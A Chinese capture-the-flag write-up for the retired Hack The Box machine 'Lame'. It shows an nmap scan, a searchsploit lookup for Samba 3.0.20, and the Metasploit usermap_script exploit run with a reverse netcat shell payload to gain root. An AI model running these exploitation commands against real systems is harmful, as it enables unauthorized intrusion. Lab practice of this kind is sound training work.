HTB: Lame 渗透测试
2021-02-26 12:13:33 Author: www.freebuf.com(查看原文) 阅读量:135 收藏

freeBuf

主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

简介:Hack The Box是一个在线渗透测试平台。可以帮助你提升渗透测试技能和黑盒测试技能,平台环境都是模拟的真实环境,有助于自己更好的适应在真实环境的渗透
链接:https://www.hackthebox.eu/home/machines
描述:图片.png注:因为是已经退役的靶机所以现在的ip地址与信息卡中的并不一致。

本次演练使用kali系统按照渗透测试的过程进行操作,首先对该靶机进行探测,获取端口与版本信息根据各个开放端口的版本查找相应的漏洞,并进行利用获取root权限

1、靶机ip

ip地址为10.129.104.53
图片.png

2、靶机端口服务
nmap -p- -A -O 10.129.104.53

图片.png

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
1、漏洞扫描

通过端口扫描发现开放了445端口,使用searchsploit查询是否存在版本漏洞

searchsploit  Samba 3.0.20

发现msf中存在可以利用的脚本
图片.png

2、漏洞利用
search Username map script
use exploit/multi/samba/usermap_script

图片.png

根据提示需要设置payload

set payload cmd/unix/reverse_netcat

图片.png
需要设置:RHOSTS、RPORT 、LHOST、LPORT(默认即可)
图片.png

图片.png

3、获取flag

图片.png

该靶机操作简单需要,直接使用msf中集成好的脚本即可,想要加深印象可以查看该漏洞的详细信息,有助于更好的了解


文章来源: https://www.freebuf.com/articles/web/264461.html
如有侵权请联系:admin#unsafe.sh